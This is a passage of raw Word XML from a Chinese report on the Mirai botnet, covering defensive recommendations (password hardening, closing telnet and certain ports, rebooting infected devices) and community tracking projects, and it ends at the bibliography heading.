      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRPr="008E4800" w:rsidRDefault="008E4800" w:rsidP="008E4800">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>向</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ISP和设备厂商索要安全补丁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRDefault="008E4800" w:rsidP="009A1AB3">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A5235" w:rsidRPr="008E4800" w:rsidRDefault="00DE7744" w:rsidP="009A1AB3">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>绿盟给出</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>针对原始Mirai程序</w:t>
      </w:r>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>23/2323</w:t>
      </w:r>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)的</w:t>
      </w:r>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>防护策略</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="723651466"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 李东宏16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">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[10]</w:t>
          </w:r>
          <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007A5235" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</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修改初始口令以及弱口令，加固用户名和密码的安全性</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禁用48101端口</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关闭telnet连接（使用了23端口）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5235" w:rsidRPr="008E4800" w:rsidRDefault="007A5235" w:rsidP="00DE7744">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox工具只允许特定用户进行使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRDefault="008E4800" w:rsidP="008E4800">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="540" w:firstLine="300"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A1AB3" w:rsidRDefault="008E4800" w:rsidP="008E4800">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="540" w:firstLine="300"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>已经感染</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>变种Mirai(7547/5555)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的设备</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>绿盟认为</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>只需</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>设备并等待15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分钟以上，再次开启设备即可清除</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>感染</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1876966205"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 绿盟科16 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>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[9]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRDefault="008E4800" w:rsidP="008E4800">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRDefault="002D6D7F" w:rsidP="002D6D7F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc469905253"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>社区研究进展</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="002D6D7F" w:rsidRDefault="002D6D7F" w:rsidP="00733050">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sidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>两位研究者在Tweet上建立了</w:t>
      </w:r>
      <w:r w:rsidR="00453D35">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>消息源</w:t>
      </w:r>
      <w:r w:rsidR="000E1845" w:rsidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(https://twitter.com/MiraiAttacks)</w:t>
      </w:r>
      <w:r w:rsidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>追踪Mirai发起的</w:t>
      </w:r>
      <w:r w:rsidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DDo</w:t>
      </w:r>
      <w:r w:rsidRPr="00733050">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S攻击</w:t>
      </w:r>
      <w:r w:rsidR="00AB2484">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。他们将400K网络标记为“#</w:t>
      </w:r>
      <w:r w:rsidR="00AB2484">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="00AB2484">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-591092268"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION len16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[13]</w:t>
          </w:r>
          <w:r w:rsidR="00010BA8">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00453D35" w:rsidRDefault="009D7B07" w:rsidP="00733050">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Pr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>360网络安全研究院上线了Mirai-Scanner（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>http://data.netlab.360.com/mirai-scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）界面，追踪Mirai僵尸网络的规模</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7472F" w:rsidRDefault="00A7472F" w:rsidP="00CB04DD">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7472F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MalwareTech</w:t>
      </w:r>
      <w:r w:rsidR="0070776C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>博</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0070776C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>主</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上线</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>了Mirai及其他僵尸网络的扫描监控系统</w:t>
      </w:r>
      <w:r w:rsidR="00CB04DD" w:rsidRPr="00CB04DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://intel.malwaretech.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00733050" w:rsidRDefault="00733050"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p w:rsidR="00453D35" w:rsidRPr="00453D35" w:rsidRDefault="00453D35" w:rsidP="00453D35">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="12" w:name="_Toc469905254" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:id w:val="-894884360"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00A6519C" w:rsidRDefault="00A6519C">
          <w:pPr>
            <w:pStyle w:val="1"/>
            <w:ind w:firstLine="883"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>书目</w:t>
          </w:r>
